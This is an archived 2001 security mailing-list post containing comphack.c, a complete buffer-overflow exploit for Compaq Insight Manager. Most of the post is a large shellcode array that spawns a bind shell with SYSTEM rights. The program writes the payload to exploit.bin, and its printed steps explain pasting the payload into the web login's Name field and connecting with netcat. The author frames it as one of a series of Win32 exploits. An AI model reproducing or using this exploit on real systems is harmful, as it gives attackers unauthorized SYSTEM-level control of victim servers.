comphack - Compaq Insight Manager Remote SYSTEM shell

From: Indigo (indig0at_private)
Date: Thu Nov 29 2001 - 03:54:47 PST

  • Next message: Fyodor: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability" 

    
 ('binary' encoding is not supported, stored as-is)
Mailer: SecurityFocus

I'm running out of Win32 vulnerabilities to exploit 
here...Anyone got any ideas?

Cheers,

Indigo.



/*	comphack.c - Compaq Insight Manager 
overflow exploit by Indigo <indig0at_private> 2001

	Usage: comphack <victim port>

	This code has been compiled and tested 
on Linux and Win32

	The shellcode spawns a SYSTEM shell on 
the chosen port

	Main shellcode adapted from code written 
by izanat_private

	Greets to:

	Morphsta, Br00t, Macavity, Jacob & 
Monkfish...Not forgetting D-Niderlunds
*/

/* #include <windows.h> uncomment if compiling on 
Win32 */
#include <stdio.h>

int main(int argc, char **argv)
{
				
unsigned char shellcode[] = 

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77
\xFF\xE1\x03\x10"
"\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7
\x31\xC9\xB1\x6F"
"\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07
\x31\xDB\xB3\x18"
"\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3
\x1D\x01\xDF\x29\x07"
"\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07
\xB3\x05\x01\xDF"
"\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07
\xB3\x12\x01\xDF"
"\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01
\xDF\x29\x07\xB3\x14"
"\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3
\x3F\x01\xDF\x29\x07"
"\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07
\xB3\x08\x01\xDF"
"\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01
\xDF\x29\x07\x66\x81"
"\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07
\x47\x47\x47\x47"
"\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7
\x5F\x5F\x5F\x5F"
"\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2
\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
"\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7
\xAD\x5D\x5F\x5F\xD2"
"\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35
\x55\xCF\xCF\xCF"
"\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09"
"\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09\xA0\xCA"
"\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09\xD2\xEA\xB2"
"\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0
\xCA\x6C\x7A\x1F"
"\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2
\xEA\xAA\x7A\x1F"
"\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79
\x1F\x5F\xF2\x0F"
"\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79
\x1F\x5F\xF2\x0F\xA0\xCA"
"\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2
\xE2\x72\x79\x1F\x5F"
"\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2
\x6E\x79\x1F\x5F\xF4\xD2"
"\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79
\x1F\x5F\x5F\x5F\x5F\x5F"
"\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2
\xEA\x66\x79\x1F\x5F"
"\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35
\x5F\x35\x4F\x35\x5E"
"\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35
\x5F\xA0\xCA\x64"
"\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37
\x5F\x5D\x5F\x5F\xA0\xCA"
"\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79
\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
"\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35
\x5C\x0C\xA0\xCA\x5D\x7A"
"\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09"
"\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79
\x1F\x5F\xF4\x6C\xBF"
"\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2
\x3A\x79\x1F\x5F\x08"
"\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x60\x7A\x1F"
"\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2
\x3A\x79\x1F\x5F\x5D"
"\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79
\x1F\x5F\x5E\x7F\x5F\x5F"
"\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79
\x1F\x5F\x5F\x7F\x5F\x5F"
"\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79
\x1F\x5F\x08\x0F"
"\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6
\x7A\x1F\x5F\xF2\x0F\xA0"
"\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10
\x7A\x1F\x5F\xD4\xDA\x3A"
"\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2\xEA"
"\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55
\x7A\x1F\x5F\x35\x5F\xD2\xE2"
"\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38
\xA0\xA0\xA0\x35"
"\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2"
"\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51
\x7A\x1F\x5F\xD6\xDA\x3E"
"\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08
\x0F\xD2\xEA\x0E"
"\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2
\x0F\xA0\xCA\x14"
"\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35
\x5F\xD4\xDA\x3E"
"\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4
\xDA\x0E\x79\x1F"
"\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x18\x7A\x1F\x5F"
"\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0
\xA0\xD2\xEA\x06"
"\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2
\xEA\x02\x79\x1F"
"\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0
\xCA\x08\x7A\x1F"
"\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\x04\x06\x08"
"\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\xF3\xDB"
"\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10
\x1C\x14\x6C\x6D"
"\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31
\x3B\x5F\x33\x36\x2C"
"\x2B\x3A\x31
\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31
\x3B\x5F"
"\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30
\x3C\x34\x3A\x2B"
"\x5F\x14\x1A\x2D\x11\x1A\x13
\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
"\x0F\x36\x2F\x3A\x5F\x18
\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
"\x31\x39\x30
\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30
\x3C\x3A"
"\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32
\x3A\x3B\x0F\x36\x2F"
"\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30
\x3C\x5F\x2D\x3A"
"\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36
\x2B\x3A\x19\x36\x33\x3A"
"\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30
\x2C\x3A\x17\x3E\x31\x3B"
"\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30
\x3C\x3A\x2C\x2C\x5F\x1C"
"\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31
\x7F\x63\x36\x25"
"\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71
\x30\x2D\x38\x61"
"\x5D\x5F\x40\x17
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
"\x53
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x
5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x1C\x12\x1B\x71\x1A\x07
\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x56\x56\x56\x56\x56\x00";
		
FILE *fp;
unsigned short int      a_port;

printf ("\nCompaq Insight Manager overflow 
launcher\nby Indigo <indig0at_private> 2001\n\n");
printf ("This program will generate a binary file called 
exploit.bin\n");
printf ("Connect to the victim using a web browser 
http://victim:2301\n");
printf ("Next to \'Login Account\', click on 
\'anonymous\'\n");
printf ("Enter some random characters into the 
\'password\' field\n");
printf ("Open exploit.bin in notepad, highlight it then 
copy to the clipboard\n");
printf ("Paste the exploit into the \'Name\' field and 
click OK\n");
printf ("\nLaunch netcat: nc <victim host> <victim 
port>\n");
printf ("\nThe exploit spawns a SYSTEM shell on the 
chosen port\n\n");

if (argc != 2)
{
	printf ("Usage: %s <victim port>\n", argv[0]);
	exit (0);
}

a_port = htons(atoi(argv[1]));
a_port^= 0x5f5f;
       
shellcode[1650]= (a_port) & 0xff;
shellcode[1651]= (a_port >> 8) & 0xff;

fp = fopen ("./exploit.bin","wb");

fputs (shellcode,fp);

fclose (fp);
	
return 0;

}

    

    



    

    


This archive was generated by hypermail 2b30 
: Thu Nov 29 2001 - 15:03:34 PST